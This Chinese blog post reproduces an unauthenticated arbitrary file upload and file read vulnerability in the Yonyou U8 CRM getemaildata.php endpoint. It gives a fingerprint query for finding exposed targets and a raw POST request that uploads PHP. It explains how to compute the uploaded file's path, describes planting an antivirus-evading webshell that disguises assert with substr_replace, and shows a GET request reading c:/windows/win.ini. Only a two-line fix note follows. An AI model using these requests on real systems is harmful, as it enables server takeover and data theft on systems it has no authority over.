用友U8+CRM 任意文件上传+读取漏洞复现(HW0day)

0x01 产品简介

      用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。

0x02 漏洞概述

   用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,攻击者通过漏洞可以获取到服务器权限。

0x03 复现环境

鹰图指纹:web.body="用友U8CRM"

用友U8+CRM 任意文件上传+读取漏洞复现(HW0day)_第1张图片

0x04 漏洞复现 

 文件上传PoC

POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host:your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ

------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; name="file"; filename="a.php "
Content-Type: text/plain


------WebKitFormBoundarykS5RKgl8t3nwInMQ

用友U8+CRM 任意文件上传+读取漏洞复现(HW0day)_第2张图片

 PS:访问的解析文件格式为upd***.tmp.php,星号部分为返回的文件名的十六进制减去一,例如上图中(不带mht):1022——>31303232(十六进制),31303231(十六进制减一)——>1021

用友U8+CRM 任意文件上传+读取漏洞复现(HW0day)_第3张图片

用友U8+CRM 任意文件上传+读取漏洞复现(HW0day)_第4张图片

 验证url

http://your-ip/tmpfile/upd十六进制减一.tmp.php

用友U8+CRM 任意文件上传+读取漏洞复现(HW0day)_第5张图片

 上传免杀马子

用友U8+CRM 任意文件上传+读取漏洞复现(HW0day)_第6张图片

PS:利用 substr_replace() 函数变形 assert 达到免杀的效果 

尝试连接

用友U8+CRM 任意文件上传+读取漏洞复现(HW0day)_第7张图片

 文件读取PoC

GET /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1
Content-Type: application/json
Host: your-ip

用友U8+CRM 任意文件上传+读取漏洞复现(HW0day)_第8张图片

0x05 修复建议

关闭互联网访问权限,文件上传模块做好权限强认证。

 尽快打补丁!

 

 

 

 

你可能感兴趣的:(漏洞复现,安全,web安全,网络安全)